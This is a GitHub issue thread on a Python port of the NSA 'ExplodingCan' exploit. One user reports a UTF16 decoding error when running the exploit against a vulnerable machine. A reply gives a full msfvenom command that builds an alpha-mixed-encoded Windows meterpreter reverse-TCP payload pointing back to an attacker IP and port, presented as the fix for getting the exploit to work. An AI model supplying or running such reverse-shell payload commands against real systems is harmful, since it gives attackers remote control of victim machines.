danigargu / explodingcan

An implementation of NSA's ExplodingCan exploit in Python
261 stars 61 forks source link

UTF16 codec error #4

Open Gromak123 opened 6 years ago

Gromak123 commented 6 years ago

Hi,

Each time I try to use your script on a known vulnerable machine, I have this error :

[-] 'utf16' codec can't decode byte 0x41 in position 742: truncated data

I have built the shellcode using the command line you give in the README.md changing just the ip. Do you know how can I solve this ?

Best regards,

ChrisMandich commented 6 years ago

Hi Gromak123. I was having issues as well with the UTF16 check. I ended up having success using the following

msfvenom -p windows/meterpreter/reverse_tcp -f raw -e x86/alpha_mixed LHOST=10.10.14.6 LPORT=4444 -o payload